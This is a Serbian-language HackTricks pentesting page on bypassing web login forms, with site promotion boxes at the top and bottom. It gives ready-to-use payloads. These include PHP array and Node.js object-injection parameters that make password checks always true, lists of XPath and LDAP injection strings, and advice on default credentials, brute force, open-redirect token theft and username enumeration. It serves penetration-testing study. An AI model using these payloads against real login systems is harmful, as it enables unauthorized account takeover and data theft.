Login Bypass
Reading time: 4 minutes
tip
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
Zaobilaženje regularnog prijavljivanja
Ako pronađete stranicu za prijavu, ovde možete pronaći neke tehnike koje možete pokušati da zaobiđete:
- Proverite komentare unutar stranice (pomaknite se prema dolje i desno?)
- Proverite da li možete direktno pristupiti ograničenim stranicama
- Proverite da ne šaljete parametre (ne šaljite nijedan ili samo 1)
- Proverite PHP greške u poređenju:
user[]=a&pwd=b
,user=a&pwd[]=b
,user[]=a&pwd[]=b
- Promenite tip sadržaja na json i pošaljite json vrednosti (bool true uključen)
- Ako dobijete odgovor koji kaže da POST nije podržan, možete pokušati da pošaljete JSON u telu, ali sa GET zahtevom sa
Content-Type: application/json
- Proverite potencijalnu grešku u parsiranju nodejs-a (pročitajte ovo):
password[password]=1
- Nodejs će transformisati taj payload u upit sličan sledećem:
SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``
password=password=1
;
što čini da deo za lozinku uvek bude tačan. - Ako možete poslati JSON objekat, možete poslati
"password":{"password": 1}
da zaobiđete prijavu. - Zapamtite da da biste zaobišli ovu prijavu, još uvek morate znati i poslati važeće korisničko ime.
- Dodavanje
"stringifyObjects":true
opcije prilikom pozivanjamysql.createConnection
će na kraju blokirati sve neočekivane ponašanja kada seObject
prosledi kao parametar. - Proverite akreditive:
- Podrazumevani akreditive tehnologije/platforme koja se koristi
- Uobičajene kombinacije (root, admin, password, naziv tehnologije, podrazumevani korisnik sa jednom od ovih lozinki).
- Kreirajte rečnik koristeći Cewl, dodajte podrazumevano korisničko ime i lozinku (ako postoji) i pokušajte da ih brute-force koristeći sve reči kao korisnička imena i lozinke
- Brute-force koristeći veći rečnik (Brute force)
SQL Injection zaobilaženje autentifikacije
Ovde možete pronaći nekoliko trikova za zaobilaženje prijave putem SQL injekcija.
Na sledećoj stranici možete pronaći prilagođenu listu za pokušaj zaobilaženja prijave putem SQL injekcija:
No SQL Injection zaobilaženje autentifikacije
Ovde možete pronaći nekoliko trikova za zaobilaženje prijave putem No SQL injekcija.
Pošto NoSQL injekcije zahtevaju promenu vrednosti parametara, moraćete da ih testirate ručno.
XPath Injection zaobilaženje autentifikacije
Ovde možete pronaći nekoliko trikova za zaobilaženje prijave putem XPath injekcije.
' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2
LDAP Injection autentifikacija zaobilaženje
Ovde možete pronaći nekoliko trikova za zaobilaženje prijave putem LDAP Injection.
*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|
Zapamti me
Ako stranica ima funkcionalnost "Zapamti me", proverite kako je implementirana i vidite da li je možete iskoristiti da preuzmete druge naloge.
Preusmeravanja
Stranice obično preusmeravaju korisnike nakon prijavljivanja, proverite da li možete izmeniti to preusmeravanje da izazovete Open Redirect. Možda možete ukrasti neke informacije (kodove, kolačiće...) ako preusmerite korisnika na vašu veb stranicu.
Ostale provere
- Proverite da li možete enumerisati korisnička imena zloupotrebom funkcionalnosti prijavljivanja.
- Proverite da li je automatsko popunjavanje aktivno u formama za lozinke/osetljive informacije input:
<input autocomplete="false">
Automatski alati
tip
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.